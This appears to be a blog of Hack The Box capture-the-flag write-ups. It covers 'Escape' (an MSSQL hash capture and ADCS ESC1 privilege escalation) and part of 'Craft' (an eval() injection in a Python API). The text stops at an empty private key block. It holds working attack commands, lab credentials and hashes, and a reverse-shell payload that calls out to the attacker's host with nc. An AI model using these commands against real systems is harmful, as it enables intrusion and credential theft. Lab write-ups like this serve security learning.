Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-06 22:57:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2026-04-06T22:59:14+00:00; +8h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-04-06T22:59:13+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2026-04-06T22:59:14+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-04-06T22:55:27
|_Not valid after: 2056-04-06T22:55:27
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2026-04-06T22:59:14+00:00; +8h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-04-06T22:59:13+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019
Aggressive OS guesses: Windows Server 2019 (97%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
| date: 2026-04-06T22:58:34
|_ start_date: N/A
| smb2-security-mode: 
| 3:1:1: 
|_ Message signing enabled and required
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m58s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.48 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-06 16:59 CEST
Nmap scan report for 10.129.19.47
Host is up (0.029s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49689/tcp open unknown
49690/tcp open unknown
49711/tcp open unknown
49720/tcp open unknown
49741/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 105.05 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-06 17:01 CEST
Nmap scan report for 10.129.19.47
Host is up (0.029s latency).
Not shown: 996 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap

We can see a number of Active Directory related ports opened. From the output I see the domain name and DC name as well - sequel.htb & dc.sequel.htb. I will add them to /etc/hosts and start from enumerating DNS.

DNS

For enumerating DNS I like to run a number of dig commands. I like to first start by enumerating the name server dig @sequel.htb dc.sequel.htb NS. dig @sequel.htb dc.sequel.htb SOA for basic information about the domain. The mail server dig @sequel.htb dc.sequel.htb MX I also like to check TXT and ALL for some left over data. And at the end I like to test for a zone transfer with dig @sequel.htb dc.sequel.htb SOA.

I also try to enumerate all domains and subdomains to make sure that I don’t miss anything. dig’s output is pretty messy, but It’s good to practice working with it.

SMB

I found no new data with DNS, let’s look for some easy data with null SMB access. Unfortunately there isn’t an anonymous access to it. I also run sudo ntpdate sequel.htb just to make user it’s not because of the time skew.

Seeing as the domain is named “sequel” maybe there is “prequel” or other subdomains in general. I will check in a second, I want to enumerate users on the domain. It can be done with netexec smb 10.129.19.47 -u 'guest' -p '' -rid-brute but it looks like the guest account is disabled.
PS: It was enabled, maybe uppercase would help or there was some setting that didn’t allow it to work. Admittedly, I didn’t look deeply into that.

Background scanning

For subdomains, I would usually run something like ffuf -u sequel.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/ -H "Host: FUZZ.sequel.htb" in the background, but ffuf requires HTTP and a web server for this to work so it won’t fly. gobuster dns -d sequel.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt on the other hand, queries DNS directly. It’s slower but it does the job.

Background subdomain bruteforce found no new domains.

LDAP

I can check if I can scoop some data with some anonymous ldapsearch queries. I ran ldapsearch -x -H ldap://10.129.19.47 -b "DC=sequel,DC=htb" but it looks like LDAP requires credentials to correctly bind and server me info. RPC similarly denies me entry when I try a null session - rpcclient -U -N 10.129.19.47.

Interesting how little information I found, I actually double-checked my connection to make sure all is working well. From interesting services on opened ports I didn’t yet check MSSQL out. But I don’t think there is any anonymous or null authentication for it. Funny how the box name is “Escape” but I can’t “Enter” it so far. Wsman and ADWS are similar, they require authentication and creds to be useful.

Foothold

I went back on my steps and noticed that I imputed the smbclient flags incorrectly. Previously I ran smbclient -L -N //10.129.228.253/ but the correct placement is smbclient -N -L //10.129.228.253/.

With smbmap -H 10.129.228.253 -u 'anonymous' -p '' I can see that the only readable shares for me are now IPC and Public. In the Public share we can find a “SQL Server Procedures.pdf” file with I downloaded to my host. I can’t run ls inside IPC so It seems I have insufficient permissions to properly enumerate it. The pdf holds information about previous incidents in the company related to insecure practices with their SQL servers at their company. From the pdf we got a step-by-step guide how to access the database, command to do so, basic credentials and a number of users mentioned. Also an email so we know the naming structure if it will come to some sort of bruteforcing.

Users:
Ryan
Tom
Brandon (Brandon.Brown@sequel.com)

Credentials: PublicUser:GuestUserCantWrite1

The guide mentions to use cmdkey /add:"<serverName>.sequel.htb" /user:"sequel\<username>" /pass:<password> however this is a windows command. I’m fairly certain that I can just plug them into mssqlclient.py from impacket. impacket-mssqlclient PublicUser:GuestUserCantWrite1@10.129.228.253.

MSSQL

I managed to authenticate to the SQL Server. I checked what databases are there with:

SQL (PublicUser guest@master)> SELECT name FROM sys.databases;
name 
------ 
master 
tempdb 
model 
msdb 

Later, I enumerated the MSSQL with these basic commands:

Use a database - USE master
Show tables - SELECT name FROM master.dbo.sysdatabases
Access data in tables - SELECT table_name FROM master.INFORMATION_SCHEMA.TABLES

But I didn’t find anything useful. I went through my other notes and tried to use XP_CMDSHELL, read files and impersonate other users that I found before but all didn’t lead to any privilege escalation. I searched further and with SELECT srvname, isremote FROM sysservers I found out that there is another SQL server. Judging by the context, this is the original DC Mockup. Sadly EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [DC\SQLMOCK] shows that my current user has insufficient permissions to query it.

As there is no one I can impersonate and my user has lacking permissions I will look for some password reuse. I checked with netexec what PublicUser can do. It showed that it could query LDAP but after trying it out with ldapsearch It seems that even tho it can correctly authenticate, it’s being denied the permission to do so.

Looking though my other notes for MSSQL I found that there is a way to catch an MSSQL’s NTLMv2 hash with responder so I tried that. I ran responder -i tun0 and then in MSSQL EXEC master..xp_dirtree '\\10.10.15.189\random' to trick it into authenticating to my host. This worked and I caught the hash.

Loot:
[SMB] NTLMv2-SSP Client : 10.129.228.253
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:2d7a260b829dfd6c:20DBD9BB0FAD204C34040A771E96C595:0101000000000000808D60B351C7DC01C44CDB13A2F20E1600000000020008004B004E005400310001001E00570049004E002D00390033003200570036004B004600550050003900360004003400570049004E002D00390033003200570036004B00460055005000390036002E004B004E00540031002E004C004F00430041004C00030014004B004E00540031002E004C004F00430041004C00050014004B004E00540031002E004C004F00430041004C0007000800808D60B351C7DC0106000400020000000800300030000000000000000000000000300000B3C49F6D23AD7F502D71A2E45F21AB5A0C4CE49C19953B329BBA1A333BE0E0F20A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310035002E003100380039000000000000000000

I copied the NTLMv2 hash into a file and ran it against rockyou with hashcat sql_svc.hash /usr/share/wordlists/rockyou.txt. With that, I cracked it - sql_svc:REGGIE1234ronnie

Privilege Escalation

Now as a sql_svc I want to check what I can authenticate to. I grew a bit tired to running a few separate netexec commands so I created a simple loop for that: for p in smb winrm mssql; do netexec $p 10.129.228.253 -u ''sql_svc -p 'REGGIE1234ronnie'; done PS: I actually created a small bash script for this, you can find it here :)

I noticed that - interestingly - sql_svc has access to winrm which I didn’t expect. I used evil-winrm and successfully authenticated into the host. I started to manually enumerate the user’s files but I didn’t find anything useful there, no creds, not user flag and nothing of note in AppData. I enumerated the user’s one the host.

d----- 2/7/2023 8:58 AM Administrator
d-r--- 7/20/2021 12:23 PM Public
d----- 2/1/2023 6:37 PM Ryan.Cooper
d----- 2/7/2023 8:10 AM sql_svc

Going down into the root directory I saw the “SQLServer” folder and entered it. I looked around and downloaded any log, config or generally interesting files into my localhost so I can go through them in search of any leaks, mentioned vulnerabilities, custom scripts or software versions.

One of those files was ERRORLOG.BAK which after further inspection shows that the user Ryan.Cooper tried but failed to authenticate into the SQL server. 2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1] Amid this data we can see that the user - likely by accident - inputted their password in clear-text as a username - Ryan.Cooper:NuclearMosquito3

Similarly to sql_svc i ran netexec and looked what I can access with the new user. Seeing that I could access the host via winrm I did just that. Looking at the user’s files I found the user flag on the Desktop, and begun to look for further privilege escalation vectors. I enumerated the AppData folder, looked for custom scripts, ran whoami /all and generally did a basic lookup of what I could do as the user.

WinPEAS

Not finding any low-hanging fruit, I decided to download and run WinPEAS as well as enumerate the domain with bloodhound-python and rusthound. Below are some interesting parts of WinPEAS output which I decided to note.

Promising winPEAS output

ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Named Pipes
 Name CurrentUserPerms Sddl
 eventlog Everyone [Allow: WriteData/CreateFiles] O:LSG:LSD:P(A;;0x12019b;;;WD)(A;;CC;;;OW)(A;;0x12008f;;;S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122)
 MSSQL$SQLMOCK\sql\query Everyone [Allow: WriteData/CreateFiles] O:S-1-5-21-4078382237-1492182817-2568127209-1106G:DUD:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-4078382237-1492182817-2568127209-1106)
 ROUTER Everyone [Allow: WriteData/CreateFiles] O:SYG:SYD:P(A;;0x12019b;;;WD)(A;;0x12019b;;;AN)(A;;FA;;;SY)
 RpcProxy\49689 Everyone [Allow: WriteData/CreateFiles] O:BAG:SYD:(A;;0x12019b;;;WD)(A;;0x12019b;;;AN)(A;;FA;;;BA)
 RpcProxy\593 Everyone [Allow: WriteData/CreateFiles] O:NSG:NSD:(A;;0x12019b;;;WD)(A;;RC;;;OW)(A;;0x12019b;;;AN)(A;;FA;;;S-1-5-80-521322694-906040134-3864710659-1525148216-3451224162)(A;;FA;;;S-1-5-80-979556362-403687129-3954533659-2335141334-1547273080)
 SQLLocal\SQLMOCK Everyone [Allow: WriteData/CreateFiles] O:S-1-5-21-4078382237-1492182817-2568127209-1106G:DUD:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-4078382237-1492182817-2568127209-1106)
 vgauth-service Everyone [Allow: WriteData/CreateFiles] O:BAG:SYD:P(A;;0x12019f;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)
---
MinPasswordLength: 7
---
ÉÍÍÍÍÍÍÍÍÍÍ¹ Autorun Applications
È Check if you can modify other users AutoRuns binaries (Note that is normal that you can modify HKCU registry and binaries indicated there) https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html
Folder: C:\Users\Ryan.Cooper\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
	FolderPerms: Ryan.Cooper [Allow: AllAccess]
	File: C:\Users\Ryan.Cooper\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini (Unquoted and Space detected) - C:\Users\Ryan.Cooper\AppData\Roaming\Microsoft\Windows
	FilePerms: Ryan.Cooper [Allow: AllAccess]
	Potentially sensitive file content: LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21787
---
If you can modify a template (WriteDacl/WriteOwner/GenericAll), you can abuse ESC4
 Dangerous rights over template: User (Rights: WriteProperty,ExtendedRight)
 Dangerous rights over template: UserSignature (Rights: WriteProperty,ExtendedRight)
 Dangerous rights over template: ClientAuth (Rights: WriteProperty,ExtendedRight)
 Dangerous rights over template: EFS (Rights: WriteProperty,ExtendedRight)
 Dangerous rights over template: UserAuthentication (Rights: WriteProperty,ExtendedRight)
 [*] Tip: Abuse with tools like Certipy (template write -> ESC1 -> enroll).

The named pipes seen above sounded as a possible priv-esc but from what I gathered if there is no impersonation, SYSTEM/Administrator or “Full Control” permissions then It likely won’t do much.
I noted that the minimal password length was 7 characters in case of a need to bruteforce.
I noticed an interesting potentially sensitive file mentioned in an autorun application but similarly to the named pipes, it didn’t mention any highly privileged users so it would likely not help much.
The last part I noted was information about dangerous rights over a few templates (so ADCS) which could be interesting. I had some experience with those and I have a bad habit of forgetting to enumerate this vector with certipy.

I kept a mental note of the aforementioned vectors and judging by my gut feeling of how successful they might be I decided to focus on the ADCS path of attack.

bloodhound-python & rusthound

Before I did anything tho, I wanted to still look what bloodhound can show me, as I could’ve very easily miss some group rights or permissions. Also, it’s easy to get data from bloodhound and It will come in handy when creating certipy commands.

I run by bloodhound command with bloodhound-python -u Ryan.Cooper -p 'NuclearMosquito3' -d sequel.htb -dc dc.sequel.htb -ns 10.129.228.253 -c all; rusthound-ce -d sequel.htb -u Ryan.Cooper -p 'NuclearMosquito3' --zip -c All --ldaps getting both general data from bloodhound-python and some additional certificate data that rusthound covers and begun to enumerate.

Certipy - ESC1

Admittedly, I didn’t find anything really useful, no additional paths of escalation. Because of that I decided to go with certipy.

I scanned Ryan’s permissions on certificates with certipy find -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -target-ip 10.129.228.253 -vulnerable -stdout and from the output I noticed that Ryan.Cooper seems to be vulnerable to ESC1. After double-checking with my notes from Authority, he seems to check all the required boxes for this to work. Said requirements are:

Enrollee Supplies Subject = True
Client Authentication = True (or a few others)
“User Enrollable Principals” showing a group your user is a part of
Requires Manager Approval = False
Authorized Signatures Required = 0

So, I begun to stitch together a certipy command. I ran -debug a few times as I never manage to run it correctly on the first try and came back with this one: certipy req -u 'Ryan.Cooper@sequel.htb' -p 'NuclearMosquito3' -dc-ip '10.129.228.253' -target 'dc.sequel.htb' -ca 'sequel-DC-CA' -template 'UserAuthentication' -upn 'administrator@sequel.htb' -sid 'S-1-5-21-4078382237-1492182817-2568127209-1105' -dc-host dc.sequel.htb -target-ip 10.129.228.253. Small rant: My god is certipy’s syntax annoying to follow. It feels like I need to repeat the same thing three times in one command.

Anyway, I got the administrator.pfx file which is a bundle of a certificate and a private key. I used it to authenticate as an administrator so that I could get a TGT and an NTML hash - certipy auth -pfx administrator.pfx -dc-ip 10.129.228.253. I also had to fix my time skew so I ran sudo ntpdate 10.129.228.253 and below is the loot:

Loot:
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee

With this information the box is really solved. Now I just had to pick a way and a tool to authenticate as an administrator. I decided to use Kerberos as I’m a bit less familiar with it than NTLM.

I checked if I had any other kerberos tickets saved up in my cache as a good practice:

azaeir@parrot (~): echo $KRB5CCNAME 

azaeir@parrot (~): klist
klist: No credentials cache found (filename: /tmp/krb5cc_1000)

Seeing as there isn’t anything there, I added the administrator.ccache that I obtained into my KRB5CCNAME environment variable:

azaeir@parrot (~): export KRB5CCNAME=administrator.ccache 
azaeir@parrot (~): echo $KRB5CCNAME 
administrator.ccache

And authenticated to the host with psexec.py -k -no-pass sequel.htb/administrator@dc.sequel.htb. I found the root flag on the Admin’s desktop.

Closing Thoughts

Escape is a great machine covering basic network enumeration, intermediate knowledge about MSSQL attack vectors and escalation with ADCS. It doesn’t show any niche techniques or obscure vulnerabilities but provides some great fundamental challenges with a seamless and intuitive attack path.

It was a good box to sharpen some core elements a pentester’s methodology, little to know curve-balls which I do appreciate.

Craft

EmilPawlak@protonmail.com (Emil Pawlak) — 04.04.2026

Enumeration

nmap

I started my nmap scan with sudo nmap -sC -sV -O -Pn 10.129.21.109; sleep 5; sudo nmap -p- -Pn 10.129.21.109; sleep 5; sudo nmap -sU -Pn 10.129.21.109

nmap scan results

Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-02 17:39 CEST
Nmap scan report for 10.129.21.109
Host is up (0.028s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
| 2048 bd:e7:6c:22:81:7a:db:3e:c0:f0:73:1d:f3:af:77:65 (RSA)
| 256 82:b5:f9:d1:95:3b:6d:80:0f:35:91:86:2d:b3:d7:66 (ECDSA)
|_ 256 28:3b:26:18:ec:df:b3:36:85:9c:27:54:8d:8c:e1:33 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=4/2%OT=22%CT=1%CU=31105%PV=Y%DS=2%DC=I%G=Y%TM=69CE8DD5
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)SEQ(
OS:SP=103%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=104%GCD=1%ISR=108%TI=Z%C
OS:I=Z%II=I%TS=A)SEQ(SP=105%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=105%GC
OS:D=2%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M4E2ST11NW7%O2=M4E2ST11NW7%O3=M4E
OS:2NNT11NW7%O4=M4E2ST11NW7%O5=M4E2ST11NW7%O6=M4E2ST11)WIN(W1=FE88%W2=FE88%
OS:W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M4E2NNSNW7%CC
OS:=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T
OS:=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40
OS:%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.44 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-02 17:40 CEST
Nmap scan report for 10.129.21.109
Host is up (0.029s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
443/tcp open https
6022/tcp open x11

Nmap done: 1 IP address (1 host up) scanned in 14.11 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-02 17:40 CEST
Nmap scan report for 10.129.21.109
Host is up (0.029s latency).
Not shown: 999 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc

Nmap done: 1 IP address (1 host up) scanned in 1008.69 seconds

Port - 6022

I accessed the port 6022 and found this info in a simple clear text

SSH-2.0-Go
��ü)¹)“3bU=²¤���Œcurve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1���ssh-rsa���Maes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128���Maes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128���Bhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96���Bhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96���none���none�������������bq¯

Speed guide shows that port 6022 belong to the x11 service which is an X Window System. “The X Window System is a windowing system for bitmap displays, common on Unix-like operating systems.” ~ Wikipedia Here is a good read on the basic concept of x11.

craft.htb

The website on 443 at first didn’t work for me but now I can view it. Front page suggest that we will work with some API calls. both menu options use two new subdomains “api.craft.htb” and “gogs.craft.htb”. I will add them to my /etc/hosts and run ffuf to look for any other subdomains and to enumerate directories. ffuf -u https://craft.htb/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fs 291 ffuf -u https://craft.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.craft.htb" -fs 3779

I also didn’t find any comments on the main website, it does use nginx 1.15.8.

api subdomain hosts different api calls. Two interesting one are authentication check to check validity of an authorization token and the authentication login to create the said token. gogs is a local git repo tools. I found some users related to it

administrator
ebachman Erlich Bachman
dinesh Dinesh Chugtai
gilfoyle Bertram Gilfoyle

I suspect there will be some API keys, tokens or creds in the repository by accident. I found a discussion about adding bogus ABV values; it was partially patched but still seems insecure, making it a potential attack vector for exploring API behavior.

Foothold

I this issue we can see this command holding a JWT token (JSON Web Token). curl -H 'X-Craft-API-Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidXNlciIsImV4cCI6MTU0OTM4NTI0Mn0.-wW1aJkLQDOE-GP5pQd3z_BJTe2Uo0jJ_mQ238P5Dqw' -H "Content-Type: application/json" -k -X POST https://api.craft.htb/api/brew/ --data '{"name":"bullshit","brewer":"bullshit", "style": "bullshit", "abv": "15.0")}'

These tokens have three parts:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 - Header
eyJ1c2VyIjoidXNlciIsImV4cCI6MTU0OTM4NTI0Mn0 - Payload
wW1aJkLQDOE-GP5pQd3z_BJTe2Uo0jJ_mQ238P5Dqw - Signature

Depending on the cryptographic in place I could crack it, but I’d need to look into that more. Let’s check other information that we can find.

Later on that issue one of the users shows a commit with this patch which another developer find bad

+ # make sure the ABV value is sane.
+ if eval('%s > 1' % request.json['abv']):
+ return "ABV must be a decimal value less than 1.0", 400
+ else:
+ create_brew(request.json)
+ return None, 201

This is Python script, it checks if the user provided “abv” input is higher than 1, and depending on result of this check creates given outcomes. There are two interesting parts of the script for us. It uses eval() which is a known dangerous function in a number of different programming languages.It’s dangerous because it runs string data as an executable instruction. The second interesting part is that request.json['abv']) plainly outputs unfiltered user output into the command. Both of these weakness are bad on their own as one gives a possibility of command execution and another of command injection. Together they are a really great foothold opportunity.

parrot@parrot (~): curl -H 'X-Craft-API-Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidXNlciIsImV4cCI6MTU0OTM4NTI0Mn0.-wW1aJkLQDOE-GP5pQd3z_BJTe2Uo0jJ_mQ238P5Dqw' -H "Content-Type: application/json" -k -X POST https://api.craft.htb/api/brew/ --data '{"name":"a","brewer":"a","style":"a","abv":"__import__(\"os\").system(\"id\")"}' 
{"message": "Invalid token or no token found."}

To try and attempt to exploit this vulnerability I’d have to have a valid token, meaning I’d have to find a not expired one in the wild or generate one which requires credentials.

I looked through the issues, repository and finally the commits and found some accidentally pushed credentials - dinesh:4aUh0A8PbVJxgd.

I used them to create my token request at the api dashboard.

TOKEN=$(curl -s -k -X GET "https://dinesh:4aUh0A8PbVJxgd@api.craft.htb/api/auth/login" -H "accept: application/json" | jq -r '.token')

Now when I try to exploit the vulnerable code my token goes through and I can test my injection payloads.

curl -H 'X-Craft-API-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiZGluZXNoIiwiZXhwIjoxNzc1MjA2MjQzfQ.1MRivtSjMK8IJKagIWHZRtp7M_632Rhp0vEk84UKYmU' -H "Content-Type: application/json" -k -X POST https://api.craft.htb/api/brew/ --data '{"name":"a","brewer":"a","style":"a","abv":"__import__("os").system("id")"}' 

This works too:

TOKEN=$(curl -s -k -X GET "https://dinesh:4aUh0A8PbVJxgd@api.craft.htb/api/auth/login" -H "accept: application/json" | jq -r '.token'); \
curl -X POST "https://api.craft.htb/api/brew/" -H "accept: application/json" -H "Content-Type: application/json" -d "{
\"id\": 0,
\"brewer\": \"0xdf\",
\"name\": \"beer\",
\"style\": \"bad\",
\"abv\": \"__import__('os').system('nc 10.10.15.189 1337 -e /bin/sh')\"}" -k -H "X-CRAFT-API-TOKEN: $TOKEN"

And this, finally works!

TOKEN=$(curl -s -k -X GET "https://dinesh:4aUh0A8PbVJxgd@api.craft.htb/api/auth/login" -H "accept: application/json" | jq -r '.token'); \
curl -X POST "https://api.craft.htb/api/brew/" -H "accept: application/json" -H "Content-Type: application/json" -d '{"id":0,"brewer":"0xdf","name":"beer","style":"bad","abv":"__import__(\"os\").system(\"nc 10.10.15.189 1337 -e /bin/sh\")"}' -k -H "X-CRAFT-API-TOKEN: $TOKEN"

I had a surprising amount of problems with quotation marks and escaping them correctly. I spent a lot of time tweaking these commands and breaking down the api logic locally.

For practice and better understanding of working with API, HTTP requests and Python I created a working script that exploits this vulnerability. The only requirements are to add api.craft.htb into the /etc/hosts and python3 to run it - you can view it on my Codeberg.

root

With this behind us we got a limited shell of the 5a3d243127f5 host on which we are root. Looking the root directory we can see the .dockerenv folder hinting that we’re inside of a container. Manual enumeration doesn’t show any interesting vectors besides the webapp files. In them we find dbtest.py which is a file we saw on gogs, it creates a query to a db from the POST data it gets. Database details like the credentials, destination and it’s name are said to be in some settings file. Moving into craft_api folder we can indeed find it. Inside, we can find the database details and a service token.

MYSQL_DATABASE_USER = 'craft'
MYSQL_DATABASE_PASSWORD = 'qLGockJ6G2J75O'
CRAFT_API_SECRET = 'hz66OCkDtv8G6D'

craft

I first tried to use mysql locally - but it isn’t installed - and call it remotely with mysql -u craft -pqLGockJ6G2J75O -h 10.129.22.88 - but this doesn’t work and hangs my shell. This is because the database isn’t local, it’s in fact on the db host which I assume is the Docker daemon. Due to the fact that my shell is connected to a simple web request it’s limited by the timeout time of the web server which is approximately 60 seconds. Due to that limitation, I was thinking how to best access the database. As my shell access was somewhat flimsy I didn’t want to bother setting up a chisel tunnel and work with transferring files - which also ruled out downloading mysql and similar tooling. What I stumbled upon was pymysql which is a python library for working with sql. As the whole box is somehow very Python for me from start until now, I decided to try it out.

With my 60 second window of opportunity I tested my commands and came up with a working one. python -c "import pymysql; c=pymysql.connect(host='db',user='craft',password='qLGockJ6G2J75O',db='craft'); cur=c.cursor(); cur.execute('SHOW TABLES'); print(cur.fetchall())" This command imports pymysql, connects to the database, creates a cursor which is a Python object that channels and sends the SQL queries to the database as well as simply show the queried data. You just need to adjust the query in the cursor and you can fetch any details from the database. Output from the above query showed me that there are two tables brew and user. Of course the latter is more interesting for us, so I ran another query. python -c "import pymysql; c=pymysql.connect(host='db',user='craft',password='qLGockJ6G2J75O',db='craft'); cur=c.cursor(); cur.execute('SELECT * FROM user'); print(cur.fetchall())" Which gave as further credentials:

((1, 'dinesh', '4aUh0A8PbVJxgd'), (4, 'ebachman', 'llJ77D8QFkLPQB'), (5, 'gilfoyle', 'ZEU3N8WNM2rh4T'))

Let’s try to access SSH with them.

gilfoyle

Sadly both on the normal port 22 and on the SSH via Go port 6022 I was unable to use it. There is however a login form on gogs. I found two public keys for the users, likely for authentication to gogs, nothing special, especially without the private keys.
dinesh: SHA256:8Fc2kZiv0Y+kjkh8atKr6brzBiM1DoDIhG6LN1ktPfA
gilfoyle: SHA256:D28DXyVaw0/mPuLBp3mDbS8z6oCRKS1hawJ5gxecFBQ

Digging further into gilfoyle I found that he had a private repository called craft-infra on which we can find his public and private SSH keys, likely to the dc host.

SSH private key

parrot@parrot (~/Desktop/htb/machines/craft): cat id_rsa 
-----BEGIN OPENSSH PRIVATE KEY-----
